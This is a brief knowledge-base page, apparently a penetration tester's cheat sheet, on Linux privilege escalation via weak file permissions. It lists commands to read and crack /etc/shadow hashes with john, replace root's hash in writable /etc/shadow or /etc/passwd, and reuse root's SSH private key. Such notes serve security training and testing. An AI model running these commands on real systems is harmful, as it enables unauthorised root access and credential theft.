Malleum Knowledge Base

Weak File Permissions Enum

1 min read

Readable /etc/shadow

Enumeration

./lse.sh -l 1 -i | more
 
#manual
 
ls -l /etc/shadow

Root User Shadow extraction

head -n 1 /etc/shadow

Understanding the type of encryption

  1. $6$ indicates that the hash was generate using sha512

Crack the hash

john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Switch user

su

Writable /etc/shadow

Make a backup

cp /etc/shadow /home/user/

Local machine

Generate SHA512 hash

mkpasswd -m sha-512 newpassword

Victim machine

 
vim /etc/shadow
 
#Replace the root user password hash with the new generate hash

Switch user

su

Writable /etc/shadow

On local machine

openssl passwd "password"

Victim machine

vim /etc/passwd

change the x in root user row with the password generated

su to switch.

## Altenatively you can copy paste the root user and append new root user at the end of the file with the password

SSH keys

Check if we can access id_rsa

Check if root login is allowed over ssh

grep PermitRootLogin /etc/ssh/sshd_config

Copy the key to the localmachine

vim root_key
 
chmod 600 root_key
 
ssh -i root_key user@Ip

Graph View

Backlinks